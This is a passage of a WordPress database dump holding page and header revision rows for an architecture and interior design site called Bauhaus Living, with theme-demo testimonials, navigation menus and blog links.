<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3> Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living</h3>\n														<h2>\n								Wujudkan mimpi anda sekarang!							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:08:59','2023-09-22 10:08:59','',22,'https://bauhaus.futuremediatrix.com/?p=4932',0,'revision','',0),(4933,3,'2023-09-22 10:44:58','2023-09-22 10:44:58','','bahaus_logo','','inherit','open','closed','','bahaus_logo','','','2023-09-22 10:44:58','2023-09-22 10:44:58','',169,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png',0,'attachment','image/png',0),(4934,3,'2023-09-22 10:45:30','2023-09-22 10:45:30','<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://demo.ovatheme.com/retirio/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner','','inherit','closed','closed','','169-revision-v1','','','2023-09-22 10:45:30','2023-09-22 10:45:30','',169,'https://bauhaus.futuremediatrix.com/?p=4934',0,'revision','',0),(4935,3,'2023-09-22 10:45:30','2023-09-22 10:45:30','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner','','inherit','closed','closed','','169-revision-v1','','','2023-09-22 10:45:30','2023-09-22 10:45:30','',169,'https://bauhaus.futuremediatrix.com/?p=4935',0,'revision','',0),(4937,3,'2023-09-22 10:47:29','2023-09-22 10:47:29','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner 1','','inherit','closed','closed','','169-revision-v1','','','2023-09-22 10:47:29','2023-09-22 10:47:29','',169,'https://bauhaus.futuremediatrix.com/?p=4937',0,'revision','',0),(4938,2,'2023-09-22 10:51:15','2023-09-22 10:51:15','<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://demo.ovatheme.com/retirio/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner','','inherit','closed','closed','','4636-revision-v1','','','2023-09-22 10:51:15','2023-09-22 10:51:15','',4636,'https://bauhaus.futuremediatrix.com/?p=4938',0,'revision','',0),(4941,3,'2023-09-22 10:52:35','2023-09-22 10:52:35','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n		